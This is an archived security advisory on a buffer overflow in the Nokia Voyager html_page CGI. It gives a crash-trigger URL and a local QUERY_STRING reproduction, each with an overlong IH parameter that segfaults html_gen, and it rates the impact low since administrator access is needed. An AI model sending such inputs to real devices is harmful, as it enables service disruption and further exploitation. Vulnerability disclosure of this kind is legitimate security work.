TUCoPS :: Unix :: General
:: nok-a.htm
Nokia Voyager malformed URL segfault
Vulnerability
Nokia Voyager
Affected
Nokia Voyager
Description
Gregory Duchemin found following. Voyager works with a
multipurposes cgi called html_page that make a call to html_gen
with a filename as a template script. Html_gen produce the final
html page returned by apache. If You test this kind of URL:
http://your-nokia/http://10.1.152.2/cgi-bin/html_page?TEMPLATE=arp&IH=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
You'll get a segfault error page. If u test it with a command
line, You'll reproduce the same signal. Obviously, html_gen is
unable to manage properly a big amount a data in some of its
parameters. IH is one of the html_page's paramaters that does the
job.
With telnet, try (under tcsh)
#setenv QUERY_STRING
"TEMPLATE=arp&IH=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
#/web/cgi-bin/html_page
Content-type: text/html
<br>Html_gen exited because of signal: Segmentation fault<br>
nokia1[admin]#
Solution
Because u already must be administrator to access the voyager
setup, security impact is relatively low considering that default
configuration wasn't poorly modified.
Because nokia ipso isn't dedicated for a multi-user work usage and
noone else root should be able to login, impact for local rooting
is low too considering the same things that above.